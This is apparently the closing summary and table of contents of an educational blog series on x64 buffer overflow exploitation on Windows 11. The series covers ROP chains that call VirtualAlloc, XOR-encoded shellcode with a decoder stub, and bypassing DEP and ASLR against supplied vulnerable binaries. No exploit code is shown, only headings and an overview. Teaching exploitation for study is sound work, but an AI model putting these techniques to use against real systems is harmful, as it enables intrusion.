This series covers the foundational exploit technique. The next layers of complexity in modern binary exploitation:
- Information leaks — defeating PIE requires leaking a memory address from the target process. Format string vulnerabilities, partial overwrites, and heap UAF bugs are common sources.
- Heap exploitation — stack overflows are rare in modern software due to stack canaries. Most real-world bugs today are heap-based (use-after-free, heap overflow, type confusion).
- Kernel exploitation — once user-land mitigations are mature, attacking the OS kernel directly. Requires defeating KASLR (kernel ASLR) and additional kernel-mode mitigations.
- Browser exploitation — multi-stage exploits combining a renderer bug, a sandbox escape, and a privilege escalation. Each stage independently defeats one layer of the protection stack.
💡 The foundational skills from this series — debugger fluency, ROP chain construction, shellcode encoding, and systematic bypass methodology — apply directly to all of these advanced topics. The techniques scale up; the thinking stays the same.

✓ Series Complete. You've gone from debugger basics through ROP chain construction, DEP bypass via VirtualAlloc+memcpy, shellcode XOR encoding with a self-decoding stub, and finally full ASLR bypass with runtime base address discovery — all on a fully patched Windows 11 24H2 machine. Vulnerable binary downloads: overflow-static.zip and overflow4.zip linked in the blog posts.

Buffer Overflowsin the Modern Era

Environment Setup & x64dbg Fundamentals

Learning Objectives

The Challenge — x64 on Windows 11

Step 1 — Disable Windows Protections for Learning

Step 2 — The Vulnerable Binary

Compile Flags — What Each Does and Why It Matters

The First Real Buffer Overflow — Controlling RIP with Python

Learning Objectives

Finding the Offset — 296 Bytes

Why We Don't See the Address in RIP

ROP Chains — Building the VirtualAlloc Call

Learning Objectives

What Are ROP Gadgets?

Finding Gadgets — Ropper and ROPgadget

Setting RCX = 0 (Easy)

Setting RDX = 1002 (Moderate)

Setting R8 = 0x3000 and R9 = 0x40 (Hard)

Shellcode Encoding, memcpy Chain & Full Exploit

Learning Objectives

The Bad Character Problem

XOR Encoding with Key 0xAC

The Decoder Stub

memcpy ROP Chain — Copying Shellcode Off the Stack

Defeating ASLR — Runtime Base Address Discovery

Learning Objectives

Re-Enable All Protections — The Real Challenge Begins

What ASLR Actually Randomizes

Converting Static Addresses to Dynamic

Buffer Overflows
in the Modern Era